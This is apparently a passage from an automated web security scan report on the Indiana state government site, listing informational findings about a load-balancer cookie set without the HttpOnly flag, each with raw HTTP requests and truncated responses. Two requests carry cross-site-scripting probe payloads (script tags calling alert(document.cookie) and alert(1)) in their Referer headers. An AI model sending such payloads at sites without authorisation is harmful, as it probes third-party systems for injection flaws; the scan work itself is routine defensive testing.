Date: Sat, 30 Apr 2011 15:03:33 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:33 GMT; path=/
Content-Length: 22384

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><!-- PageID 2252 - pub
...[SNIP]...

14.528. http://www.in.gov/ai/js-webtrends/webtrends.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /ai/js-webtrends/webtrends.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ai/js-webtrends/webtrends.js HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:09 GMT
Server: Apache
Last-Modified: Wed, 14 Jul 2010 20:01:38 GMT
ETag: "bf4343-5e28-48b5e741bac80"
Accept-Ranges: bytes
Content-Length: 24104
Content-Type: application/javascript
Content-Language: en
X-Pad: avoid browser bug
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 01:28:09 GMT; path=/

// WebTrends SmartSource Data Collector Tag
// Version: 8.6.2
// Tag Builder Version: 3.0
// Created: 6/16/2009 3:46:21 PM

function WebTrends(){
   var that=this;
   // begin: user modifiable
...[SNIP]...

14.529. http://www.in.gov/ai/js-webtrends/wtbase.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /ai/js-webtrends/wtbase.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ai/js-webtrends/wtbase.js HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:57 GMT
Server: Apache
Last-Modified: Tue, 11 Sep 2007 14:53:55 GMT
ETag: "d72d4c-2d70-439dd4630c6c0"
Accept-Ranges: bytes
Content-Length: 11632
Content-Type: application/javascript
Content-Language: en
X-Pad: avoid browser bug
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:57 GMT; path=/

// START OF Advanced SmartSource Data Collector TAG
// Copyright (c) 1996-2006 WebTrends Inc. All rights reserved.
// $DateTime: 2006/04/10 22:15:22 $
var gService = false;
var gTimeZone = -5;
// Code
...[SNIP]...

14.530. http://www.in.gov/apps/options/email.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /apps/options/email.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /apps/options/email.aspx HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:38:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6095
Connection: close
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:39:57 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><title
...[SNIP]...

14.531. http://www.in.gov/apps/options/rate.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /apps/options/rate.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /apps/options/rate.aspx HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:38:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8313
Connection: close
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:39:57 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><title
...[SNIP]...

14.532. http://www.in.gov/apps/options/suggestion.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /apps/options/suggestion.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /apps/options/suggestion.aspx HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:38:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6297
Connection: close
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:39:58 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><title
...[SNIP]...

14.533. http://www.in.gov/core/faqs.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /core/faqs.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/faqs.html HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:38:59 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:39:59 GMT; path=/
Content-Length: 17382

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><!-- Instan
...[SNIP]...

14.534. http://www.in.gov/dhs/3163.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dhs/3163.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dhs/3163.htm HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:00 GMT
Server: Apache/2.2.13 (Unix) DAV/2
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerdhs_web_prod=2536835082.20480.0000; expires=Sat, 30-Apr-2011 12:40:00 GMT; path=/
Content-Length: 36537

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><!-- PageID 3163 - pub
...[SNIP]...

14.535. http://www.in.gov/dnr/6406.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dnr/6406.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dnr/6406.htm HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:00 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:40:00 GMT; path=/
Content-Length: 34152

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><!-- PageID 6406 - pub
...[SNIP]...

14.536. http://www.in.gov/dwd/2216.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/2216.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/2216.css HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:53 GMT
Server: Apache
Last-Modified: Thu, 13 Jan 2011 14:16:24 GMT
ETag: "e560c0-1091-499baf66abe00"
Accept-Ranges: bytes
Content-Length: 4241
Content-Type: text/css
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:53 GMT; path=/

...#col2top {background-image: url(/dwd/images/col2_top_bg.jpg); width: 567px;}
#col1top {background-image: url(/dwd/images/amber_void.jpg);}
#col3topfluid {background-image: url(/dwd/images/col3_to
...[SNIP]...

14.537. http://www.in.gov/dwd/2217.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/2217.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/2217.js HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:53 GMT
Server: Apache
Last-Modified: Thu, 13 Jan 2011 14:16:24 GMT
ETag: "568d66-47d-499baf66abe00"
Accept-Ranges: bytes
Content-Length: 1149
Content-Type: application/javascript
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:53 GMT; path=/

...<a href="/dwd/2554.js">anc_JQuery_Javascript</a>">
<a href="/dwd/2555.js">anc_Expander_Javascript</a>">

$(document).ready(function() {
// override some default options
$('div#col2 p.more')
...[SNIP]...

14.538. http://www.in.gov/dwd/WorkOne//  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/WorkOne//

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/WorkOne//?513f2 HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.workoneworks.com/?513f2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6c36e2d12eb=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:25 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 4703
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 15:04:25 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

14.539. http://www.in.gov/dwd/WorkOne//favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/WorkOne//favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/WorkOne//favicon.ico?c8bb8 HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.workoneworks.com/favicon.ico?c8bb8%22%3E%3Cscript%3Ealert(1)%3C/script%3E27c9e25d6ef=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 15:03:52 GMT
Server: Apache
Location: http://www.IN.gov/ai/errors/dwd_404.html
Content-Length: 224
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:52 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.IN.gov/ai/errors/dwd_404.html">here<
...[SNIP]...

14.540. http://www.in.gov/dwd/WorkOne//images/body_bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/WorkOne//images/body_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/WorkOne//images/body_bg.gif HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/dwd/WorkOne//?513f2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:32 GMT
Server: Apache
Last-Modified: Fri, 10 Dec 2010 17:53:26 GMT
ETag: "8651c9-613-4971207fbf180"
Accept-Ranges: bytes
Content-Length: 1555
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:32 GMT; path=/

GIF89a....................................................................................................vw{tuyz{~xy|...........................~.|}..................................................
...[SNIP]...

14.541. http://www.in.gov/dwd/WorkOne//images/index_footer.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/WorkOne//images/index_footer.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/WorkOne//images/index_footer.jpg HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/dwd/WorkOne//?513f2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:32 GMT
Server: Apache
Last-Modified: Fri, 10 Dec 2010 17:53:27 GMT
ETag: "151785c-1f0bc-49712080b33c0"
Accept-Ranges: bytes
Content-Length: 127164
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:32 GMT; path=/

......JFIF.....H.H.....{Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS2 Windows.2008:12:03 15:18:39.........
...[SNIP]...

14.542. http://www.in.gov/dwd/WorkOne//images/index_people.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/WorkOne//images/index_people.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/WorkOne//images/index_people.png HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/dwd/WorkOne//?513f2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:30 GMT
Server: Apache
Last-Modified: Fri, 10 Dec 2010 17:53:28 GMT
ETag: "8651d4-3b59c-49712081a7600"
Accept-Ranges: bytes
Content-Length: 243100
Content-Type: image/png
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:30 GMT; path=/

.PNG
.
...IHDR.......x........w...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

14.543. http://www.in.gov/dwd/WorkOne//images/wrapper_bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/WorkOne//images/wrapper_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/WorkOne//images/wrapper_bg.gif HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/dwd/WorkOne//?513f2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:32 GMT
Server: Apache
Last-Modified: Fri, 10 Dec 2010 17:53:23 GMT
ETag: "398143-5d-4971207ce2ac0"
Accept-Ranges: bytes
Content-Length: 93
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:32 GMT; path=/

GIF89a.......................................................!.....    .,..........
P.).1$.}z..;

14.544. http://www.in.gov/dwd/WorkOne//scripts/gfeedfetcher.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/WorkOne//scripts/gfeedfetcher.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/WorkOne//scripts/gfeedfetcher.js HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/dwd/WorkOne//?513f2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:25 GMT
Server: Apache
Last-Modified: Fri, 10 Dec 2010 17:53:21 GMT
ETag: "129ac4f-17f4-4971207afa640"
Accept-Ranges: bytes
Content-Length: 6132
Content-Type: application/javascript
Content-Language: en
X-Pad: avoid browser bug
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:25 GMT; path=/

// -------------------------------------------------------------------
// gAjax RSS Feeds Displayer- By Dynamic Drive, available at: http://www.dynamicdrive.com
// Created: July 17th, 2007 Updated:
...[SNIP]...

14.545. http://www.in.gov/dwd/WorkOne//styles/index_layout.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/WorkOne//styles/index_layout.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dwd/WorkOne//styles/index_layout.css HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/dwd/WorkOne//?513f2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:30 GMT
Server: Apache
Last-Modified: Fri, 10 Dec 2010 17:53:27 GMT
ETag: "69aa65-241-49712080b33c0"
Accept-Ranges: bytes
Content-Length: 577
Content-Type: text/css
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:30 GMT; path=/

#leftSide {
   float:left;
   padding:0px;
   margin:0px 0px 0px 27px;
   width:472px;
   height:376px;
   overflow:hidden;
}

#header {
   background:none;
}

#footer {
   height:220px;
   background:ur
...[SNIP]...

14.546. http://www.in.gov/dwd/WorkOne//styles/index_styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/WorkOne//styles/index_styles.css

Issue detail

